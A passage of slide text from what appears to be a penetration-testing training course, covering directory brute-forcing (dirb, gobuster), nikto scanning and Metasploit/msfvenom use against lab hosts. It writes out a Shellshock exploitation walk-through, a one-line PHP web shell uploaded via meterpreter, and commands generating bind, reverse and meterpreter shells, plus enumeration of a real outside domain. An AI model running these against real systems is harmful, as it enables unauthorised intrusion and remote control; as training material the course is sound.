(and/or hidden) web objects. It works by launching a
dictionary-based attack against a web server and
analyzing the response.

It comes with a set of preconfigured attack wordlists for

easy usage, but you can use your custom wordlists.

www.cybexer.com 157
DIRB - usage
'dirb' is a command-line tool. If you run it from Linux
terminal window without any options, it will display its
help
• dirb

www.cybexer.com 158
DIRB - usage
To scan the web server, provide its hostname or IP
address. Be sure you use full URL format with HTTP or
HTTPS scheme
• dirb http://srv.studentXX.csirt.crp/

www.cybexer.com 159
DIRB - usage
If target web server is located not on standard port 80
or 443, you can use http(s) scheme with port number
http://10.XX.32.5:8080/

If you want to scan specific folder of web target, you

can add folder name to URL
http://10.XX.32.5:8080/project/

www.cybexer.com 160
DIRB - usage
By default, 'dirb' uses its own medium size wordlist,
which is located at
'/usr/share/dirb/wordlists/common.txt'. This wordlist
has over 4500 lines of different words.
'dirb' has several wordlists,
'/usr/share/dirb/wordlists/big.txt' which is over 20000
lines and '/usr/share/dirb/wordlists/small.txt' with
900+ lines.

www.cybexer.com 161
DIRB - usage
To use several wordlists, append them (comma
separated) after hostname or IP address
• cd /usr/share/dirb/wordlists
• dirb http://10.XX.32.5/ ./small.txt,./big.txt

www.cybexer.com 162
DIRB - usage
By default, if 'dirb' finds a folder on the target web
server, it will apply same dictionary to that folder. And if
new folders will be found, 'dirb' will scan them again.
This default action is very noisy, but to limit search to
single folder, user '-r' option. This will not do recursive
crawling
• dirb http://10.XX.32.5/ -r

www.cybexer.com 163
DIRB - usage
There are might be situations where you need to
extract the files of a specific extension over the target
server. '-X' parameter followed by extension name(s)
will append it to wordlist
• dirb http://10.21.32.5/ -X .php,.pl,.txt

www.cybexer.com 164
DIRB - usage
If you need to scan target server with delay of each
request, add option '-z' followed by number of
milliseconds
• dirb http://10.XX.32.5/ -z 1356 -r

www.cybexer.com 165
DIRB - usage
For the purpose of better readability, and future
references, you can save the output of the 'dirb' scan to
the file. To do this, use the parameter '-o' followed by
file name where output will be saved.
• dirb http://10.XX.32.5/ -r -o output.txt

www.cybexer.com 166
DIRB - usage
To ignore listing files or folders with unnecessary HTTP
response code, use '-N' option followed by 3-digit
response code number
• dirb http://10.XX.32.5/ -r -N 403

www.cybexer.com 167
DIRB - usage
If target site uses HTTP basic authentication, user '-u'
option followed by column separated username and
password
• dirb http://10.XX.32.5/ -r -u user:pass

www.cybexer.com 168
DIRB - usage
Some web sites may serve different content based on
browser's User-Agent string. To change default User-
Agent string, use '-a' option
• dirb http://10.XX.32.5/ -r -a 'Mozilla/5.0 (Linux;
Android 6.0.1; E6653 Build/32.2.A.0.253)
Chrome/52.0.2743.98'

www.cybexer.com 169
DIRB - usage
In some environments, access to web site might be only
through a proxy server. Option '-p' followed by proxy
server's IP address and port number, will send all
requests through that proxy.
• dirb http://10.XX.32.5/ -r -p 127.0.0.1:3128

www.cybexer.com 170
DIRB - usage
If proxy server allows to access it only with username
and the password, add '-P' option followed by proxy
server credentials
• dirb http://10.XX.32.5/ -r -p 127.0.0.1:3128 -P
proxy_user:proxy_pass

www.cybexer.com 171
NIKTO
NIKTO
NIKTO - web server vulnerability detector.
Advanced scanner to identify different weaknesses in
web server:
• Web server and software misconfigurations
• Default files and programs
• Insecure files and programs
• Outdated servers and programs

www.cybexer.com 173
NIKTO - usage
For basic scanning of web server, you have to supply its
IP address of hostname and port
• nikto -h 10.XX.32.5 -p 80

www.cybexer.com 174
NIKTO - usage
You can specify target site, by specifying it in URL
notation
• nikto -h http://10.XX.32.5/

www.cybexer.com 175
NIKTO - usage
For scanning HTTPS web server, you have to supply its
IP address of hostname, port and use '-ssl' option
• nikto -h 10.XX.32.4 -p 443 -ssl

www.cybexer.com 176
NIKTO - usage
To scan several ports, write them comma-separated
after '-p' option.
• nikto -h 10.XX.32.5 -p 80,8080,8081

www.cybexer.com 177
NIKTO - usage
By default, 'nikto' uses User-Agent specified in the
configuration file '/etc/nikto.conf'
• grep -A 5 -B5 USERAGENT /etc/nikto.conf

www.cybexer.com 178
NIKTO - usage
Some IDS systems may block access to the sites with
default settings (to minimize hacks by script-kiddies).
'nikto' allows to change its User-Agent by setting '-
useragent' option followed by custom name
• nikto -h http://10.XX.32.5/ -useragent "IOS 5.0,
iPad 2022 generation"

www.cybexer.com 179
GOBUSTER
GOBUSTER - installation
Kali Linux has 'gobuster' software in its repository. To
install it, run following command in your terminal
• apt-get install gobuster

www.cybexer.com 181
GOBUSTER - usage
To scan target web server, you have to specify URL for
hostname and path to the dictionary file
• gobuster dir -u http://10.XX.32.5/ -w
/usr/share/dirbuster/wordlists/directory-list-2.3-
small.txt

www.cybexer.com 182
GOBUSTER - usage
If you need to filter certain HTTP response codes, use '-
s' options followed by code number (can be coma-
separated)
• gobuster dir -u http://10.XX.32.5/ -w
/usr/share/dirbuster/wordlists/directory-list-2.3-
small.txt -s 200,401,403

www.cybexer.com 183
GOBUSTER - usage
Similar to 'nikto', 'gobuster' uses its own User-Agent
string 'gobuster/3.1.0'. To change it, use '-a' option
followed by custom User-Agent string
• gobuster dir -u http://10.XX.32.5/ -w
/usr/share/dirbuster/wordlists/directory-list-2.3-
small.txt -a "Firefox 3.0"

www.cybexer.com 184
GOBUSTER - usage
In addition to web server scanning, 'gobuster' can run
DNS enumeration. To scan for DNS subdomains, you
need to supply domain name and path to dictionary file
• gobuster dns -d cnn.com -w
/usr/share/dnsenum/dns.txt

www.cybexer.com 185
Metasploit
Metasploit - intro
Metasploit is extremely robust and flexible penetration
testing framework and has tons of tools to perform
various simple and complex tasks.

www.cybexer.com 187
Metasploit - intro
Metasploit has various components which are located
in different categories

www.cybexer.com 188
Metasploit - intro
Auxiliaries - piece of code specifically written to perform a
task.

Some examples of auxiliaries:

auxiliary/admin/http/tomcat_administration - scans a
range of IP addresses and locates the Tomcat Server
administration panel and version
auxiliary/scanner/mysql/mysql_login - brute-force login
tool for MySQL servers
auxiliary/scanner/http/open_proxy - scan for open HTTP
proxies

www.cybexer.com 189
Metasploit - intro
Exploits - actual code that will execute on the target
system to take advantage of vulnerability.

Some examples of exploits:

windows/smb/ms17_010_eternalblue - ETERNALBLUE
exploit
unix/webapp/drupal_drupalgeddon2 - exploit for
Drupal CMS

www.cybexer.com 190
Metasploit - intro
Payloads - is the action that needs to be performed
after the execution of an exploit.

Some examples of payloads:

payload/generic/shell_reverse_tcp - generic reverse
TCP command shell
payload/php/reverse_php - reverse TCP PHP command
shell

www.cybexer.com 191
Metasploit - intro
Encoders - various techniques and algorithms to
obfuscate the payload in a way it does not get detected
by antivirus software.

Some examples of encoders:

encoder/cmd/powershell_base64 - Powershell Base64
command encoder
encoder/cmd/perl - Perl command encoder

www.cybexer.com 192
Metasploit - intro
POST (post-exploitation activities) - further infiltration
modules, which are used after successful exploitation.

Some examples of encoders:

post/linux/gather/enum_users_history - gather Linux
user history
post/windows/manage/install_ssh - install OpenSSH
on Winidows

www.cybexer.com 193
Metasploit - usage
Since Metasploit relies on Postgres database, before
first run, Metasploit must be configured for database
• msfdb init

www.cybexer.com 194
Metasploit - usage
If Metasploit already configured, then initialization
script will inform that

• msfdb init

www.cybexer.com 195
Metasploit - usage
Let's start Metasploit
• msfconsole

www.cybexer.com 196
Metasploit - usage
It is important to keep Metasploit up-to-date. Check
the version in MSF console
• version

www.cybexer.com 197
Metasploit - usage
Check the database connectivity in MSF console
• db_status

If database is not started, 'db_status' command will

show following output

To start Postgres SQL database, run following command

in Linux terminal
• service postgresql start

www.cybexer.com 198
Metasploit - usage
To list content of each category
• show encoders

www.cybexer.com 199
Metasploit - usage
Search for specific exploit/encoder/auxiliary etc.
• search ftp

www.cybexer.com 200
Metasploit - usage
To get more precise search results, use better search
query
• search windows printer

www.cybexer.com 201
Metasploit - usage
Metasploit is very powerful tool for various attack phases -
information gathering, scanning, exploitation and post-
exploitation.

Information gathering is the first and one of the most, if

not the most, important activities in penetration testing.
This step is carried out in order to find out as much
information about the target machine as possible.
The more information we have, the better our chances will
be for exploiting the target.

www.cybexer.com 202
Metasploit - usage
There are two types of techniques used in information
gathering
Passive information gathering - is used to gain
information about the target, without having any
physical connectivity or access to it.

Active information gathering - logical connection is set

up with the target in order to gain information.

www.cybexer.com 203
Metasploit - usage
Let's do our first information gathering task.

Since DNS is one of most important protocols in

internet, we will do DNS record scanning and
enumeration.

DNS enumeration is a passive information gathering.

www.cybexer.com 204
Metasploit - usage
To run 'auxiliary' module in MSF console, we use the
'use' command followed by the module name.

In MSF console switch to auxiliary module 'enum_dns'

• use auxiliary/gather/enum_dns

www.cybexer.com 205
Metasploit - usage
To display various information about the module, use
'info' command
• info

www.cybexer.com 206
Metasploit - usage
To show only module specific options, use following
command in MSF console
• show options

www.cybexer.com 207
Metasploit - usage
Module options has following columns:
Name - name of variable
Current Setting - value of variable
Required - is variable required or not. If required
variable is not set and module executed, then error will
be shown

Description - description of variable

www.cybexer.com 208
Metasploit - usage
We can see, that 'DOMAIN' variable is required, but set
empty. Let's set some domain name to that variable
• set DOMAIN zonetransfer.me

Now if we run 'show options' again, we will see correct

DOMAIN variable
• show options

www.cybexer.com 209
Metasploit - usage
Depends on environment and security rules, you might
have to set custom DNS server.

• set NS 10.103.176.2

www.cybexer.com 210
Metasploit - usage
Now we can run our DNS enumeration against
'zonetransfer.me' domain. In MSF console type 'run'
and hit 'Enter'
• run

www.cybexer.com 211
Metasploit - usage
Now, let's examine results of DNS enumeration of
'zonetransfer.me' domain

Note. Instead of 'run' command you can use 'exploit', it

is an alias, but looks cooler :)

www.cybexer.com 212
Metasploit - usage
Next is active information gathering with Metasploit.
MSF has several port scanner modules. Let's see what
port scanning modules MSF has
• search portscan

www.cybexer.com 213
Metasploit - usage
We start with simple SYN port scanning
• use auxiliary/scanner/portscan/syn

www.cybexer.com 214
Metasploit - usage
Let's see what options are required for port scanning.
Type following command MSF console
• show options

www.cybexer.com 215
Metasploit - usage
As we can see, the only required option for port
scanning which is empty is 'RHOSTS'. RHOSTS stands for
remote hosts. RHOSTS can be single IP address, range
of IP addresses, a hostname or CIDR identifier
• set RHOSTS 10.XX.32.5

To make port scanning run a bit faster, let's lower the

port range to 100 ports
• set PORTS 1-100

www.cybexer.com 216
Metasploit - usage
After target is set and port range adjusted, we can start
scanning with 'run' command
• run

www.cybexer.com 217
Metasploit - usage
Auxiliary port scanning modules 'scanner/portscan' use
MSF built-in functions. They are not very efficient and
powerful comparing to 'nmap'. MSF allows to scan
targets using native 'nmap' with all its rich functionality.

Syntax for running 'nmap' from Metasploit is exactly

the same as you would run 'nmap' from Linux
command line.

www.cybexer.com 218
Metasploit - usage
Exploiting targets is done in this way

- select exploit you want to use

- set required options
- run exploit against the target

www.cybexer.com 219
Metasploit - usage
Search Metasploit database for required exploit. In our
case, we need to search for 'shellshock'. In 'msfconsole'
prompt run following command
• search shellshock

www.cybexer.com 220
Metasploit - usage
Since we do not know that target is vulnerable to
'shellshock' exploit, we have to test it. Let's select that
exploit
• use
exploit/multi/http/apache_mod_cgi_bash_env_exe
c

www.cybexer.com 221
Metasploit - usage
Since each exploit can have several required options,
lets check them
• show options

www.cybexer.com 222
Metasploit - usage
From list of options, we can see that options 'RHOSTS'
and 'TARGETURI' are required, but not set. Let's set
those options
• set rhosts 10.XX.32.3
• set targeturi /cgi-bin/test.sh

www.cybexer.com 223
Metasploit - usage
It's advised to verify options again before running the
exploit against the target
• show options

www.cybexer.com 224
Metasploit - usage
Before actual exploitation, you can check if target is
vulnerable to selected exploit
• check

www.cybexer.com 225
Metasploit - usage
After all options are set and verified, you can run the
exploit
• exploit -j

www.cybexer.com 226
Metasploit - usage
To list active/established sessions, type in following
command
• sessions -l

www.cybexer.com 227
Metasploit - usage
To start interacting with active session use following
command (be sure to pick correct session number)
• sessions -i 1

www.cybexer.com 228
Metasploit - usage
To display 'meterpreter' help commands type following
• help

www.cybexer.com 229
Metasploit - usage
In active 'meterpreter' session you can run simple
systems commands
cat
cp
mkdir
mv
rm
etc.

www.cybexer.com 230
Metasploit - usage
Since we already know, that target machine is running
Linux operating system, lets switch from 'meterpreter'
shell to Linux command shell
• shell

www.cybexer.com 231
Metasploit - usage
To exit remote shell type 'exit' to quit it
• exit

www.cybexer.com 232
Metasploit - usage
Once you have entered 'meterpreter' session, you can
upload new exploits/backdoors/files to remote
machine.
Open new Kali Linux terminal and type following
command
• echo '<?php system($_GET[c]);?>' > /tmp/file.php

www.cybexer.com 233
Metasploit - usage
In active 'meterpreter' sessions upload new file to
specified remote location
• upload /tmp/file.php /var/www/html/file.php

Now access new file from your browser and add '?c=id'
to parameter

www.cybexer.com 234
Metasploit - usage
In 'meterpreter' prompt type 'exit' to quit it.
This command will shutdown active session.

www.cybexer.com 235
Metasploit - usage
To exit meterpreter shell, but keep session running,
type following command:
• bg

www.cybexer.com 236
Metasploit - usage
We also know, that remote target might have
vulnerable services.

Try to exploit them!

www.cybexer.com 237
Msfvenom
MSFvenom
Msfvenom is a standalone payload generator.

Msfvenom is a combination of Msfpayload and

Msfencode, putting both of these tools into a single
Framework making it as go to tool for generating
and encoding payload(s) for different uses.

www.cybexer.com 239
MSFvenom
In Kali we can list all msfvenom functionality by
simply running following command
• msfvenom

www.cybexer.com 240
MSFvenom
Supported platform list: • AIX
• JavaScript
• Cisco • HPUX
• OSX • PHP
• Solaris • Irix
• BSD • Unix
• OpenBSD • Linux
• hardware • Ruby
• Firefox • Java
• BSDi • Android
• NetBSD • Netware
• NodeJS • Windows
• FreeBSD • mainframe
• Python • multi

www.cybexer.com 241
MSFvenom
Msfvenom has different modules for specific
actions. To list all available payloads, type following
command in your Kali terminal:
• msfvenom -l payloads

www.cybexer.com 242
MSFvenom
Listing other modules
• msfvenom -l encoders
• msfvenom -l archs
• msfvenom -l platforms
• msfvenom -l encrypt

www.cybexer.com 243
MSFvenom
Once specific payload is chosen, you can list its
options
• msfvenom -p php/meterpreter/bind_tcp --list-
options

www.cybexer.com 244
MSFvenom
Before generating desired payload, it's important to
pay attention to required options

www.cybexer.com 245
MSFvenom
For customized payload generation, you might want
to adjust advanced options

www.cybexer.com 246
MSFvenom
Before generating your first payload, you must
know following
• type of payload

Will the payload be executed on Linux or Windows

operating system?
What architecture is used on target machine?
Will payload be .exe, ELF, PHP, Java or PowerShell?
To what IP address and port payload will connect?

www.cybexer.com 247
MSFvenom
Let's generate our first payload.
Payload will be executed on Linux operating system.
Payload will be an executable file (ELF).
Payload will be running on 64-bit system.
Listening IP address will be - 127.0.0.1
Listening port will be - 4567

www.cybexer.com 248
MSFvenom
Let's check what payload options must be set
• msfvenom -p generic/shell_bind_tcp --list-
options

www.cybexer.com 249
MSFvenom
To generate the payload, type following command
in your Kali terminal
• msfvenom -p generic/shell_bind_tcp
LPORT=4567 -a x64 -f elf --platform Linux -o
/tmp/shell01

www.cybexer.com 250
MSFvenom
Set executable bit for the file
• chmod a+x /tmp/shell01
Check generated payload
• ls -la /tmp/shell01

Check file type

• file /tmp/shell01

www.cybexer.com 251
MSFvenom
Execute the shellcode
• /tmp/shell01

You will not see anything after execution.

www.cybexer.com 252
MSFvenom
Open new Kali terminal window and type following
command
• nc localhost 4567
You will not see any prompt or output.
Just type any Linux command

www.cybexer.com 253
MSFvenom
Now we generate new, reverse shell
• msfvenom -p linux/x64/shell_reverse_tcp
LHOST=127.0.0.1 LPORT=5678 -f elf -o
/tmp/shell02

www.cybexer.com 254
MSFvenom
Set executable bit for the file
• chmod a+x /tmp/shell02
Check generated payload
• ls -la /tmp/shell02

Check file type

• file /tmp/shell02

www.cybexer.com 255
MSFvenom
Since we generated the reverse shell, once the shell
is executed, it will connect to listening IP address
and port specified with LHOST and LPORT options.
In new Kali terminal window type following
command
• nc -lvp 5678

www.cybexer.com 256
MSFvenom
Now we can execute our second shell. In Kali
terminal window type following (keep nc running in
another terminal window)
• /tmp/shell02
If reverse connection was established, you should
see following text in you "nc" terminal window

www.cybexer.com 257
MSFvenom
Now you can run Linux commands

www.cybexer.com 258
MSFvenom
Meterpreter shell
The Meterpreter (short for meta-interpreter) shell, a special type
of shell, is the bread and butter of Metasploit. It can be added as
a payload that is either a bind shell or reverse shell. The
Meterpreter is one of the advanced payloads available with the
MSF, but you should not look at it as just a payload. Rather one
should view it as an exploit platform that is executed on the
remote system. It has its own command shell, which provides
the attacker with a wide variety of activities that can be executed
on the exploited system.

www.cybexer.com 259
MSFvenom
Let's generate meterpreter reverse shell.
First, we have to check what options must be set
before shellcode generation
• msfvenom -p
linux/x64/meterpreter/reverse_tcp --list-options

www.cybexer.com 260
MSFvenom
Type following command in your Kali terminal
• msfvenom -p
linux/x64/meterpreter/reverse_tcp
LHOST=127.0.0.1 LPORT=6789 -f elf -o
/tmp/shell03

www.cybexer.com 261
MSFvenom
Set executable bit for the file
• chmod a+x /tmp/shell03
Check generated payload
• ls -la /tmp/shell03

Check file type

• file /tmp/shell03

www.cybexer.com 262
MSFvenom
Next step is to run a Metasploit console with a
handler. Type following command in Kali
terminal
• msfconsole

www.cybexer.com 263
MSFvenom
Now let's configure a handler. In Metasploit type
following commands
• use exploit/multi/handler

www.cybexer.com 264
MSFvenom
Before running stager, we have to see what
options must be configured
• show options

www.cybexer.com 265
MSFvenom
Now we have to set option identical to our
shellcode options - port and payload
• set payload
linux/x64/meterpreter/reverse_tcp
• set LHOST 127.0.0.1
• set LPORT 6789

www.cybexer.com 266
MSFvenom
Before executing the handler, it is wise to re-
check stager's settings
• show options

www.cybexer.com 267
MSFvenom
Once everything is correct, we can execute the
handler. Type following command in Metasploit
• run -j

www.cybexer.com 268
MSFvenom
Final step is to launch shellcode in Kali terminal
• /tmp/shell03
If shellcode was able to connect to handler, then
following message will appear in Metasploit
window

www.cybexer.com 269
MSFvenom
Let's see available sessions in Metasploit. Type
following command
• sessions -l

www.cybexer.com 270
MSFvenom
To start interacting with available session, type
following command (be sure to use correct
session ID number)
• sessions -i 1

www.cybexer.com 271
MSFvenom
Meterpreter allows to run built-in system
commands or run native shell of the remote
system. To see full list of available options, type
following command in Metasploit
• help

www.cybexer.com 272